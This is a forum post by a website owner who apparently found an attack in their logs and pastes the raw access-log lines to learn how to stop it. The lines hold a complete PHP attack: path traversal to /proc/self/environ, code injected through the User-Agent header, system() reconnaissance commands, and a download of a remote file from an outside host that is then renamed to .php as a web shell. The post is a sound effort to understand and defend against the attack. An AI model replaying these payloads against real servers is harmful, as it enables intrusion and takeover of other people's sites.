I’ve looked throughout the web for a real php injection example and discussion for how it works so I know exactly how to thwart it. I haven’t found it, so I’m going to post what happened to me. Hope there isn’t some etiquette about this or that this imperils all of us now
[CODE]
64.120.149.69 – – [04/Jul/2010:13:15:39 -0500] “GET /catalog/?product_id=150824//index2.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34775 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘ls -al; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:07 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34772 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘ls -al; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:30 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34323 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘lwp-download http://sep-a.biz/tools/flash.txt; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:37 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 35005 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPXCWD<?php chdir(’19 /home/sbsrus/public_html 1 1e’); ?>XCWDEXPLORE<pre><?php echo system(‘ls -al; echo ; exit;’); ?></pre>EXPLORE”
64.120.149.69 – – [04/Jul/2010:13:16:58 -0500] “GET /catalog/?product_id=149288//index.php?option=com_product&controller=../../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1” 200 34203 “-” “Mozilla/5.0 XHOSTNAME<?php echo system(‘hostname;echo ;’); ?>XHOSTNAMEXSIP<?php echo $_SERVER[‘SERVER_ADDR’]; ?>XSIPXUNAME<?php echo system(‘uname -a;echo ;’); ?>XUNAMEXUSERID<?php echo system(‘id;echo ;’); ?>XUSERIDXPWD<?php echo system(‘pwd;echo ;’); ?>XPWDXPHP<?php echo phpversion(); ?>XPHPEXPLORE<pre><?php echo system(‘mv flash.txt flash.php; echo ; exit;’); ?></pre>EXPLORE”
I have no clue what the %00 is but it turns into a weird character on my url bar and without it, this whole thing doesn’t work. With it, the computer echoes out the user agent string and php code gets executed. The person appended //index2.php etc. etc. to my normal url stuff. I can’t image why doing //index2.php etc. works. There is no index2.php on my server. there is an index.php in the root, but then doesn’t everyone have an index.php in the root?
I thought I’d see if this is especially pernicious by trying this code out on other sites, but then I thought I’d go to jail, so instead, I’m just putting it out there.